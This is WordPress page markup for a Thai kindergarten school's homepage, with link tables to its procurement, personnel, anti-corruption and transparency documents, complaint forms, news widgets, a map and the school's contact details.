900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- 